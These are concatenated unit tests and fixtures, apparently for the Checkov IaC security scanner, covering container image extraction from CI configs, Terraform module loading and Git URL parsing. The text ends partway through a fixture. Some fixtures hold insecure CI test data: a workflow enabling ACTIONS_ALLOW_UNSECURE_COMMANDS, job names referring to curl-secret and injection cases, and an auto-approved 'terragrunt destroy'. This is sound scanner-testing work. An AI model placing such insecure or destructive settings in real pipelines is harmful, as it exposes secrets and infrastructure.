from checkov.common.images.image_referencer import Image
from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager


def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image):
    file_path = '/.github/workflows/workflow_with_string_container.yml'

    manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_with_images,
                                                  workflow_line_numbers=workflow_line_numbers_with_image)
    images = manager.extract_images_from_workflow()

    assert images == [
        Image(
            end_line=13,
            start_line=12,
            name='node:14.16',
            file_path=file_path,
            related_resource_id='jobs(destroy_cert)'
        )
    ]


def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image):
    file_path = '/.github/workflows/unsecure_command.yaml'

    manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_without_images,
                                                  workflow_line_numbers=workflow_line_numbers_without_image)
    images = manager.extract_images_from_workflow()

    assert not images



import pytest

from checkov.common.images.image_referencer import Image
from checkov.github_actions.image_referencer.provider import GithubActionProvider
from checkov.github_actions.runner import Runner

def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image):
    file_path = '/.github/workflows/workflow_with_string_container.yml'

    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_images,
                                        workflow_line_numbers=workflow_line_numbers_with_image)
    images = gha_provider.extract_images_from_workflow()

    assert images == [
        Image(
            end_line=13,
            start_line=12,
            name='node:14.16',
            file_path=file_path,
            related_resource_id='jobs(destroy_cert)'
        )
    ]


def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image):
    file_path = '/.github/workflows/unsecure_command.yaml'

    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_without_images,
                                        workflow_line_numbers=workflow_line_numbers_without_image)
    images = gha_provider.extract_images_from_workflow()

    assert not images


def test_extract_images_from_workflow_with_first_image(workflow_with_image_first, workflow_line_numbers_with_image_first):
    file_path = '/.github/workflows/command.yaml'

    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_image_first,
                                        workflow_line_numbers=workflow_line_numbers_with_image_first)
    images = gha_provider.extract_images_from_workflow()

    assert len(images) == 2
    assert images[0].start_line != images[1].start_line
    assert images[0].end_line != images[1].end_line
    assert images[0].related_resource_id != images[1].related_resource_id


def test_extract_images_from_workflow_correct_line_numbers(workflow_with_two_identical_images,
                                                           workflow_line_numbers_with_two_identical_images):
    file_path = '/.github/workflows/unsecure_command.yaml'

    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_two_identical_images,
                                        workflow_line_numbers=workflow_line_numbers_with_two_identical_images)
    images = gha_provider.extract_images_from_workflow()

    assert len(images) == 2
    assert images[0].start_line != images[1].start_line
    assert images[0].end_line != images[1].end_line
    assert images[0].related_resource_id != images[1].related_resource_id


@pytest.mark.parametrize(
    "start_line,end_line,expected_key",
    [
        (9, 17, "jobs(container-test-job)"),
        (24, 30, "jobs(second_job)"),
        (35, 40, "")
    ],
)
def test_generate_resource_key(start_line, end_line, expected_key, definition):
    gha_provider = GithubActionProvider(definition, '', [])

    key = gha_provider.generate_resource_key(start_line, end_line)

    assert key == expected_key


@pytest.mark.parametrize(
    "start_line, end_line, supported_entities, old_key_format, expected_key",
    [
        (9, 17, ('jobs', 'jobs.*.steps[]'), 'jobs.container-test-job.CKV_GHA_3[7:23]', "jobs(container-test-job)"),
        (24, 30, ('jobs', 'jobs.*.steps[]'), "jobs.second_job.CKV_GHA_3[24:30]", "jobs(second_job)")
    ],
)
def test_generate_resource_key_generates_same_key_as_get_resource(start_line, end_line, supported_entities,
                                                                  old_key_format, expected_key, definition):
    gha_provider = GithubActionProvider(definition, '', [])
    runner = Runner()
    file_path = "mock_path"
    runner.definitions[file_path] = definition

    key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line)
    key2 = gha_provider.generate_resource_key(start_line, end_line)

    assert key1 == key2 == expected_key



from pathlib import Path

from checkov.common.output.report import CheckType

from checkov.common.bridgecrew.bc_source import get_source_type
from checkov.gitlab_ci.runner import Runner

from checkov.runner_filter import RunnerFilter
from pytest_mock import MockerFixture

from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async

RESOURCES_PATH = Path(__file__).parent / "resources/single_image"


def test_gitlab_workflow(mocker: MockerFixture):
    from checkov.common.bridgecrew.platform_integration import bc_integration
    file_name = ".gitlab-ci.yml"
    image_name = "redis:latest"
    image_id = "sha256:2460522297"
    code_lines = "3-6"
    image_resource_postfixes = ['go', 'openssl', 'musl']
    test_file = RESOURCES_PATH / file_name

    runner_filter = RunnerFilter(run_image_referencer=True)
    bc_integration.bc_source = get_source_type("disabled")

    mocker.patch(
        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
        side_effect=mock_get_image_cached_result_async,
    )
    mocker.patch(
        "checkov.common.images.image_referencer.get_license_statuses_async",
        side_effect=mock_get_license_statuses_async,
    )

    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)

    assert len(reports) == 2

    gitlab_ci_report = next(report for report in reports if report.check_type == CheckType.GITLAB_CI)
    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)

    assert len(gitlab_ci_report.resources) == 0
    assert len(gitlab_ci_report.passed_checks) == 1
    assert len(gitlab_ci_report.failed_checks) == 1
    assert len(gitlab_ci_report.skipped_checks) == 0
    assert len(gitlab_ci_report.parsing_errors) == 0

    assert len(sca_image_report.resources) == 3
    assert sca_image_report.resources == {
        f"{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}"
        for postfix in image_resource_postfixes
    }
    assert sca_image_report.image_cached_results[0]["dockerImageName"] == "redis:latest"
    assert sca_image_report.image_cached_results[0]["packages"] == [
        {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
    ]

    assert len(sca_image_report.passed_checks) == 1
    assert len(sca_image_report.failed_checks) == 4
    assert len(sca_image_report.image_cached_results) == 1
    assert len(sca_image_report.skipped_checks) == 0
    assert len(sca_image_report.parsing_errors) == 0
    assert gitlab_ci_report.passed_checks[0].resource == sca_image_report.image_cached_results[0]["relatedResourceId"]



import unittest
from pathlib import Path

from checkov.terraform.checks.resource.gcp.GKEBasicAuth import check
from checkov.runner_filter import RunnerFilter
from checkov.terraform.runner import Runner


class TestGKEBinaryAuthorization(unittest.TestCase):
    def test(self):
        test_files_dir = Path(__file__).parent / "example_GKEBasicAuth"
        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
        summary = report.get_summary()

        passing_resources = {
            'google_container_cluster.pass',
            'google_container_cluster.pass2',
            'google_container_cluster.pass3',
        }
        failing_resources = {
            'google_container_cluster.fail',
            'google_container_cluster.fail2',
        }

        passed_check_resources = {c.resource for c in report.passed_checks}
        failed_check_resources = {c.resource for c in report.failed_checks}

        self.assertEqual(summary['passed'], 3)
        self.assertEqual(summary['failed'], 2)
        self.assertEqual(summary['skipped'], 0)
        self.assertEqual(summary['parsing_errors'], 0)

        self.assertEqual(passing_resources, passed_check_resources)
        self.assertEqual(failing_resources, failed_check_resources)


if __name__ == '__main__':
    unittest.main()


import os
import shutil
import unittest

from checkov.common.util.consts import DEFAULT_EXTERNAL_MODULES_DIR
from checkov.terraform.module_loading.module_finder import find_modules, should_download, load_tf_modules
from checkov.terraform.module_loading.registry import module_loader_registry


class TestModuleFinder(unittest.TestCase):
    @staticmethod
    def get_src_dir():
        cur_dir = os.path.abspath(os.path.dirname(__file__))
        return os.path.join(cur_dir, 'data', 'tf_module_downloader', 'public_modules')

    def test_module_finder(self):
        modules = find_modules(self.get_src_dir())
        self.assertEqual(2, len(modules), f"modules: {list(map(lambda mod: mod.module_link, modules))}")
        remote_modules = list(filter(lambda mod: should_download(mod.module_link), modules))
        self.assertEqual(1, len(remote_modules))
        for m in remote_modules:
            if 'terraform-aws-modules' in m.module_link:
                self.assertEqual('~>2.1.0', m.version)
            else:
                self.assertIsNone(m.version)

    def test_module_finder_ignore_comments(self):
        modules = find_modules(self.get_src_dir())
        module_list = list(map(lambda mod: mod.module_link, modules))
        for m in module_list:
            self.assertIn(m, ["terraform-aws-modules/s3-bucket/aws",
                              "../../../../../../../platform/src/stacks/accountStack"])

    def test_downloader(self):
        modules = find_modules(self.get_src_dir())

        remote_modules = [m for m in modules if should_download(m.module_link)]
        module_loader_registry.download_external_modules = True
        load_tf_modules(os.path.join(self.get_src_dir()), run_parallel=True)
        downloaded_modules = os.listdir(os.path.join(self.get_src_dir(), DEFAULT_EXTERNAL_MODULES_DIR))
        distinct_roots = {md.module_link.split('/')[0] for md in remote_modules}
        shutil.rmtree(os.path.join(self.get_src_dir(), DEFAULT_EXTERNAL_MODULES_DIR))
        self.assertEqual(len(downloaded_modules), 1)
        self.assertEqual(len(distinct_roots), 1)



from __future__ import annotations
import pytest

from checkov.common.images.image_referencer import Image


@pytest.fixture
def file_path() -> str:
	return ".circleci/config.yml"


@pytest.fixture
def circleci_config_with_images_definitions(file_path) -> dict:
	return {
		file_path: {
			"orbs": {
				"new-orb": "whatever/orbname@goodorb",
				"some-orb": "orbs/orbname@dev:blah",
				"__startline__": 6,
				"__endline__": 9
			},
			"executors": {
				"default-executor": {
					"machine": {
						"image": "windows-server-2022",
						"__startline__": 12,
						"__endline__": 14
					},
					"__startline__": 11,
					"__endline__": 14
				},
				"image-executor": {
					"docker": {
						"image": "mongo:2.6.8",
						"__startline__": 16,
						"__endline__": 18
					},
					"__startline__": 15,
					"__endline__": 18
				},
				"__startline__": 10,
				"__endline__": 18
			},
			"jobs": {
				"test-docker-versioned-img": {
					"docker": [
						{
							"image": "mongo:2.6.8",
							"__startline__": 21,
							"__endline__": 22
						}
					],
					"steps": [
						"some-step"
					],
					"__startline__": 20,
					"__endline__": 25
				},
				"__startline__": 19,
				"__endline__": 25
			},
			"__startline__": 5,
			"__endline__": 25
		}
	}


@pytest.fixture
def circle_ci_filepath_workflow_with_images_config(circleci_config_with_images_definitions, file_path) \
		-> tuple[str, dict]:
	return file_path, circleci_config_with_images_definitions.get(file_path)


@pytest.fixture
def circleci_config_no_images_definitions(file_path) -> dict:
	return {
		file_path: {
			"orbs": {
				"new-orb": "whatever/orbname@goodorb",
				"some-orb": "orbs/orbname@dev:blah",
				"__startline__": 6,
				"__endline__": 9
			},
			"executors": {
				"default-executor": {
					"machine": {
						"image": "windows-server-2022",
						"__startline__": 12,
						"__endline__": 14
					},
					"__startline__": 11,
					"__endline__": 14
				},
				"__startline__": 10,
				"__endline__": 14
			},
			"jobs": {
				"test-macos-image": {
					"macos": {
						"xcode": "9.4.1",
						"__startline__": 17,
						"__endline__": 18
					},
					"steps": [
						"some-step"
					],
					"__startline__": 16,
					"__endline__": 21
				},
				"test-machine-default": {
					"executor": {
						"name": "win/default-executor",
						"__startline__": 23,
						"__endline__": 24
					},
					"steps": [
						"some-step"
					],
					"__startline__": 22,
					"__endline__": 27
				},
				"__startline__": 15,
				"__endline__": 27
			},
			"__startline__": 5,
			"__endline__": 27
		}
	}


@pytest.fixture
def circle_ci_filepath_workflow_no_images_config(circleci_config_no_images_definitions, file_path) -> tuple[str, dict]:
	return file_path, circleci_config_no_images_definitions.get(file_path)


@pytest.fixture
def circle_ci_image1(file_path) -> Image:
	image = Image(
		end_line=18,
		start_line=16,
		name='mongo:2.6.8',
		file_path=file_path,
		related_resource_id='executors(image-executor).docker.image[1](mongo:2.6.8)',
	)
	return image


@pytest.fixture
def circle_ci_image2(file_path) -> Image:
	image = Image(
		end_line=22,
		start_line=21,
		name='mongo:2.6.8',
		file_path=file_path,
		related_resource_id='jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)',
	)
	return image


@pytest.fixture
def image_cached_result() -> dict:
	return {
		"results": [
			{
				"id": "sha256:9dbc24674f25eb449df11179ed3717c47348fb3aa985ae14b3936d54c2c09dde",
				"name": "postgres:14.2",
				"distro": "Debian GNU/Linux 11 (bullseye)",
				"distroRelease": "bullseye",
				"digest": "sha256:2c954f8c5d03da58f8b82645b783b56c1135df17e650b186b296fa1bb71f9cfd",
				"collections": [
					"All"
				],
				"packages": [
					{
						"type": "os",
						"name": "base-files",
						"version": "11.1+deb11u3",
						"licenses": [
							"GPL"
						]
					}
				],
				"compliances": [],
				"complianceDistribution": {
					"critical": 0,
					"high": 2,
					"medium": 0,
					"low": 0,
					"total": 2
				},
				"complianceScanPassed": True,
				"vulnerabilities": [
				],
				"vulnerabilityDistribution": {
					"critical": 9,
					"high": 26,
					"medium": 8,
					"low": 17,
					"total": 60
				},
				"vulnerabilityScanPassed": True
			}
		]
	}


@pytest.fixture
def image_cached_results_for_report() -> tuple:
	return (
		{
			'image_name': 'redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673',
			'related_resource_id': 'jobs(test-docker-hash-img).docker.image[1](redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'buildpack-deps:latest',
			'related_resource_id': 'jobs(test-docker-latest-img).docker.image[1](buildpack-deps:latest)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'mongo:2.6.8',
			'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'postgres:14.2',
			'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[2](postgres:14.2)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'cimg/python:latest',
			'related_resource_id': 'jobs(test-echo).docker.image[1](cimg/python:latest)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'cimg/python:latest',
			'related_resource_id': 'jobs(test-inject).docker.image[1](cimg/python:latest)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'cimg/python:latest',
			'related_resource_id': 'jobs(test-inject2).docker.image[1](cimg/python:latest)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'cimg/python:latest',
			'related_resource_id': 'jobs(test-curl-secret).docker.image[1](cimg/python:latest)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'cimg/python:latest',
			'related_resource_id': 'jobs(test-inject-ci-vars).docker.image[1](cimg/python:latest)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		},
		{
			'image_name': 'mongo:2.6.8',
			'related_resource_id': 'executors(image-executor).docker.image[1](mongo:2.6.8)',
			'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}]
		}
	)



import unittest

from checkov.common.goget.github.get_git import GitGetter


class TestGitGetter(unittest.TestCase):
    def test_parse_source(self):
        url = "https://my-git.com/repository-name/"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("https://my-git.com/repository-name/", git_url, "Parsed source url should contain hostname and path")
        self.assertEqual("", subdir, "Parsed source subdirectory should be empty")

    def test_parse_source_and_subdirectory(self):
        url = "https://my-git.com/repository-name.git//sub/path"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("https://my-git.com/repository-name.git", git_url, "Parsed source url should contain hostname and path")
        self.assertEqual("/sub/path", subdir, "Parsed source subdirectory should contain absolute (sub)path")
    
    def test_parse_source_and_subdirectory_without_git(self):
        url = "https://my-git.com/repository-name//sub/path"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("https://my-git.com/repository-name", git_url, "Parsed source url should contain hostname and path")
        self.assertEqual("/sub/path", subdir, "Parsed source subdirectory should contain absolute (sub)path")
    
    def test_parse_source_with_query(self):
        url = "https://my-git.com/repository-name?key=value"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("https://my-git.com/repository-name?key=value", git_url, "Parsed source url should contain hostname, path and query")
        self.assertEqual("", subdir, "Parsed source subdirectory should be empty")
    
    def test_parse_source_and_subdirectory_with_query(self):
        url = "https://my-git.com/repository-name//sub/path?key=value"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("https://my-git.com/repository-name?key=value", git_url, "Parsed source url should contain hostname, path and query")
        self.assertEqual("/sub/path", subdir, "Parsed source subdirectory should contain absolute (sub)path")
    
    def test_parse_source_without_scheme(self):
        url = "my-git.com/repository-name"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("my-git.com/repository-name", git_url, "Parsed source url should contain hostname and path")
        self.assertEqual("", subdir, "Parsed source subdirectory should be empty")
    
    def test_parse_source_and_subdirectory_without_scheme(self):
        url = "my-git.com/repository-name//sub/path"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("my-git.com/repository-name", git_url, "Parsed source url should contain hostname ane path")
        self.assertEqual("/sub/path", subdir, "Parsed source subdirectory should contain absolute (sub)path")
    
    def test_parse_source_with_query_without_scheme(self):
        url = "my-git.com/repository-name?key=value"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("my-git.com/repository-name?key=value", git_url, "Parsed source url should contain hostname, path and query")
        self.assertEqual("", subdir, "Parsed source subdirectory should be empty")
    
    def test_parse_source_and_subdirectory_with_query_without_scheme(self):
        url = "my-git.com/repository-name//sub/path?key=value"
        getter = GitGetter(url)
        git_url, subdir = getter._source_subdir()
        self.assertEqual("my-git.com/repository-name?key=value", git_url, "Parsed source url should contain hostname, path and query")
        self.assertEqual("/sub/path", subdir, "Parsed source subdirectory should contain absolute (sub)path")


if __name__ == '__main__':
    unittest.main()



import os
import unittest
from pathlib import Path

from pytest_mock import MockerFixture

from checkov.terraform.plan_parser import parse_tf_plan
from checkov.common.parsers.node import StrNode

class TestPlanFileParser(unittest.TestCase):

    def test_tags_values_are_flattened(self):
        current_dir = os.path.dirname(os.path.realpath(__file__))
        valid_plan_path = current_dir + "/resources/plan_tags/tfplan.json"
        tf_definition, _ = parse_tf_plan(valid_plan_path, {})
        file_resource_definition = tf_definition['resource'][0]
        resource_definition = next(iter(file_resource_definition.values()))
        resource_attributes = next(iter(resource_definition.values()))
        resource_tags = resource_attributes['tags'][0]
        for tag_key, tag_value in resource_tags.items():
            if tag_key not in ['__startline__', '__endline__', 'start_line', 'end_line']:
                self.assertIsInstance(tag_value, StrNode)

    def test_more_tags_values_are_flattened(self):
        current_dir = os.path.dirname(os.path.realpath(__file__))
        valid_plan_path = current_dir + "/resources/plan_tags_variety/tfplan.json"
        tf_definition, _ = parse_tf_plan(valid_plan_path, {})
        # TODO: this should also verify the flattening but at least shows it parses now.
        assert True

    # Check Plan Booleans are treated similar to normal Terraform Parser
    # https://github.com/bridgecrewio/checkov/issues/1764
    def test_simple_type_booleans_clean(self):
        current_dir = os.path.dirname(os.path.realpath(__file__))
        valid_plan_path = current_dir + "/resources/plan_booleans/tfplan.json"
        tf_definition, _ = parse_tf_plan(valid_plan_path, {})
        file_resource_definition = tf_definition['resource'][0]
        resource_definition = next(iter(file_resource_definition.values()))
        resource_attributes = next(iter(resource_definition.values()))
        self.assertTrue(resource_attributes['metadata'][0]['a'][0])
        self.assertTrue(resource_attributes['metadata'][0]['b'][0])
        self.assertFalse(resource_attributes['metadata'][0]['c'][0])
        self.assertFalse(resource_attributes['metadata'][0]['d'][0])

    def test_encodings(self):
        current_dir = os.path.dirname(os.path.realpath(__file__))
        plan_files = ['tfplan_mac_utf8.json', 'tfplan_win_utf8.json', 'tfplan_win_utf16.json']

        for plan_file in plan_files:
            plan_path = os.path.join(current_dir, "resources", "plan_encodings", plan_file)
            tf_definition, _ = parse_tf_plan(plan_path, {})
            self.assertEqual(list(tf_definition['resource'][0].keys())[0], "aws_s3_bucket")


def test_large_file(mocker: MockerFixture):
    # given
    test_file = Path(__file__).parent / "resources/plan_encodings/tfplan_mac_utf8.json"

    mocker.patch("checkov.cloudformation.parser.cfn_yaml.MAX_IAC_FILE_SIZE", 1)

    # when
    tf_definition, _ = parse_tf_plan(str(test_file), {})

    assert tf_definition['resource'][0]['aws_s3_bucket']['b']['start_line'][0] == 0
    assert tf_definition['resource'][0]['aws_s3_bucket']['b']['end_line'][0] == 0


if __name__ == '__main__':
    unittest.main()



from __future__ import annotations
from typing import Any

import pytest


@pytest.fixture
def workflow_with_images() -> dict[str, Any]:
    return {
        "name": "Name",
        "on": {
            "workflow_dispatch": {
                "inputs": {
                    "logLevel": {
                        "description": "Log level",
                        "__startline__": 6,
                        "__endline__": 8
                    },
                    "__startline__": 5,
                    "__endline__": 8
                },
                "__startline__": 4,
                "__endline__": 8
            },
            "__startline__": 3,
            "__endline__": 8
        },
        "jobs": {
            "destroy_cert": {
                "runs-on": "ubuntu-latest",
                "name": "Name",
                "container": "node:14.16",
                "steps": [
                    {
                        "name": "Checkout codebase",
                        "uses": "actions/checkout@v3",
                        "__startline__": 14,
                        "__endline__": 16
                    },
                    {
                        "name": "infrastructure",
                        "working-directory": "terraform",
                        "shell": "bash",
                        "env": {
                            "TF_INPUT": 0,
                            "__startline__": 20,
                            "__endline__": 21
                        },
                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
                        "__startline__": 16,
                        "__endline__": 24
                    }
                ],
                "__startline__": 10,
                "__endline__": 24
            },
            "__startline__": 9,
            "__endline__": 24
        },
        "__startline__": 1,
        "__endline__": 24
    }


@pytest.fixture
def workflow_line_numbers_with_image() -> list[tuple[int, str]]:
    return [(1, 'name: Name\n'),
            (2, 'on:\n'),
            (3, '  workflow_dispatch:\n'),
            (4, '    inputs:\n'),
            (5, '      logLevel:\n'),
            (6, "        description: 'Log level'\n"),
            (7, '\n'),
            (8, 'jobs:\n'),
            (9, '  destroy_cert:\n'),
            (10, '    runs-on: ubuntu-latest\n'),
            (11, '    name: Name\n'),
            (12, '    container: node:14.16\n'),
            (13, '    steps:\n'),
            (14, '      - name: Checkout codebase\n'),
            (15, '        uses: actions/checkout@v3\n'),
            (16, '      - name: infrastructure\n'),
            (17, '        working-directory: terraform\n'),
            (18, '        shell: bash\n'),
            (19, '        env:\n'),
            (20, '          TF_INPUT: 0\n'),
            (21, '        run: |\n'),
            (22, '          terragrunt init\n'),
            (23, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n')]


@pytest.fixture
def workflow_without_images() -> dict[str, Any]:
    return {
        "on": "pull_request",
        "name": "unsecure-worfklow",
        "jobs": {
            "unsecure-job": {
                "name": "job2",
                "runs-on": "ubuntu-latest",
                "env": {
                    "ACTIONS_ALLOW_UNSECURE_COMMANDS": True,
                    "__startline__": 10,
                    "__endline__": 11
                },
                "steps": [
                    {
                        "name": "unsecure-step2",
                        "run": "echo \"goo\"\n",
                        "__startline__": 12,
                        "__endline__": 15
                    }
                ],
                "__startline__": 7,
                "__endline__": 15
            },
            "secure-job": {
                "name": "job3",
                "runs-on": "ubuntu-latest",
                "env": {
                    "ACTIONS_ALLOW_UNSECURE_COMMANDS": False,
                    "__startline__": 19,
                    "__endline__": 20
                },
                "run": "echo \"ok\"",
                "__startline__": 16,
                "__endline__": 21
            },
            "__startline__": 6,
            "__endline__": 21
        },
        "__startline__": 1,
        "__endline__": 21
    }


@pytest.fixture
def workflow_line_numbers_with_image_first() -> list[tuple[int, str]]:
    return [(1, 'name: Name\n'),
            (2, 'on:\n'),
            (3, '  workflow_dispatch:\n'),
            (4, '    inputs:\n'),
            (5, '      logLevel:\n'),
            (6, "        description: 'Log level'\n"),
            (7, '\n'),
            (8, 'jobs:\n'),
            (9, '  first_job:\n'),
            (10, '    container: node:14.22\n'),
            (11, '    name: Name\n'),
            (12, '    book: wood\n'),
            (13, '    steps:\n'),
            (14, '      - name: Checkout codebase\n'),
            (15, '        uses: actions/checkout@v3\n'),
            (16, '      - name: infrastructure\n'),
            (17, '        working-directory: terraform\n'),
            (18, '        shell: bash\n'),
            (19, '        env:\n'),
            (20, '          TF_INPUT: 0\n'),
            (21, '        run: |\n'),
            (22, '          terragrunt init\n'),
            (23, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n'),
            (24, '  second_job:\n'),
            (25, '    runs-on: ubuntu-latest\n'),
            (26, '    name: Name\n'),
            (27, '    container: node:14.16\n'),
            (28, '    steps:\n'),
            (29, '      - name: Checkout codebase\n'),
            (30, '        uses: actions/checkout@v3\n'),
            (31, '      - name: infrastructure\n'),
            (32, '        working-directory: terraform\n'),
            (33, '        shell: bash\n'),
            (34, '        env:\n'),
            (35, '          TF_INPUT: 0\n'),
            (36, '        run: |\n'),
            (37, '          terragrunt init\n'),
            (38, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n')
            ]


@pytest.fixture
def workflow_line_numbers_with_two_identical_images() -> list[tuple[int, str]]:
    return [(1, 'name: Name\n'),
            (2, 'on:\n'),
            (3, '  workflow_dispatch:\n'),
            (4, '    inputs:\n'),
            (5, '      logLevel:\n'),
            (6, "        description: 'Log level'\n"),
            (7, '\n'),
            (8, 'jobs:\n'),
            (9, '  first_job:\n'),
            (10, '    runs-on: ubuntu-latest\n'),
            (11, '    name: Name\n'),
            (12, '    container: node:14.16\n'),
            (13, '    steps:\n'),
            (14, '      - name: Checkout codebase\n'),
            (15, '        uses: actions/checkout@v3\n'),
            (16, '      - name: infrastructure\n'),
            (17, '        working-directory: terraform\n'),
            (18, '        shell: bash\n'),
            (19, '        env:\n'),
            (20, '          TF_INPUT: 0\n'),
            (21, '        run: |\n'),
            (22, '          terragrunt init\n'),
            (23, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n'),
            (24, '  second_job:\n'),
            (25, '    runs-on: ubuntu-latest\n'),
            (26, '    name: Name\n'),
            (27, '    container: node:14.16\n'),
            (28, '    steps:\n'),
            (29, '      - name: Checkout codebase\n'),
            (30, '        uses: actions/checkout@v3\n'),
            (31, '      - name: infrastructure\n'),
            (32, '        working-directory: terraform\n'),
            (33, '        shell: bash\n'),
            (34, '        env:\n'),
            (35, '          TF_INPUT: 0\n'),
            (36, '        run: |\n'),
            (37, '          terragrunt init\n'),
            (38, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n')
            ]


@pytest.fixture
def workflow_with_image_first() -> dict[str, Any]:
    return {
        "name": "Name",
        "on": {
            "workflow_dispatch": {
                "inputs": {
                    "logLevel": {
                        "description": "Log level",
                        "__startline__": 6,
                        "__endline__": 8
                    },
                    "__startline__": 5,
                    "__endline__": 8
                },
                "__startline__": 4,
                "__endline__": 8
            },
            "__startline__": 3,
            "__endline__": 8
        },
        "jobs": {
            "first_job": {
                "runs-on": "ubuntu-latest",
                "name": "Name",
                "container": "node:14.22",
                "steps": [
                    {
                        "name": "Checkout codebase",
                        "uses": "actions/checkout@v3",
                        "__startline__": 14,
                        "__endline__": 16
                    },
                    {
                        "name": "infrastructure",
                        "working-directory": "terraform",
                        "shell": "bash",
                        "env": {
                            "TF_INPUT": 0,
                            "__startline__": 20,
                            "__endline__": 21
                        },
                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
                        "__startline__": 16,
                        "__endline__": 24
                    }
                ],
                "__startline__": 10,
                "__endline__": 24
            },
            "second_job": {
                "runs-on": "ubuntu-latest",
                "name": "Name",
                "container": "node:14.16",
                "steps": [
                    {
                        "name": "Checkout codebase",
                        "uses": "actions/checkout@v3",
                        "__startline__": 29,
                        "__endline__": 31
                    },
                    {
                        "name": "infrastructure",
                        "working-directory": "terraform",
                        "shell": "bash",
                        "env": {
                            "TF_INPUT": 0,
                            "__startline__": 35,
                            "__endline__": 36
                        },
                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
                        "__startline__": 31,
                        "__endline__": 39
                    }
                ],
                "__startline__": 25,
                "__endline__": 39
            },
            "__startline__": 24,
            "__endline__": 39
        },
        "__startline__": 1,
        "__endline__": 39
    }


@pytest.fixture
def workflow_with_two_identical_images() -> dict[str, Any]:
    return {
        "name": "Name",
        "on": {
            "workflow_dispatch": {
                "inputs": {
                    "logLevel": {
                        "description": "Log level",
                        "__startline__": 6,
                        "__endline__": 8
                    },
                    "__startline__": 5,
                    "__endline__": 8
                },
                "__startline__": 4,
                "__endline__": 8
            },
            "__startline__": 3,
            "__endline__": 8
        },
        "jobs": {
            "first_job": {
                "runs-on": "ubuntu-latest",
                "name": "Name",
                "container": "node:14.16",
                "steps": [
                    {
                        "name": "Checkout codebase",
                        "uses": "actions/checkout@v3",
                        "__startline__": 14,
                        "__endline__": 16
                    },
                    {
                        "name": "infrastructure",
                        "working-directory": "terraform",
                        "shell": "bash",
                        "env": {
                            "TF_INPUT": 0,
                            "__startline__": 20,
                            "__endline__": 21
                        },
                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
                        "__startline__": 16,
                        "__endline__": 24
                    }
                ],
                "__startline__": 10,
                "__endline__": 24
            },
            "second_job": {
                "runs-on": "ubuntu-latest",
                "name": "Name",
                "container": "node:14.16",
                "steps": [
                    {
                        "name": "Checkout codebase",
                        "uses": "actions/checkout@v3",
                        "__startline__": 29,
                        "__endline__": 31
                    },
                    {
                        "name": "infrastructure",
                        "working-directory": "terraform",
                        "shell": "bash",
                        "env": {
                            "TF_INPUT": 0,
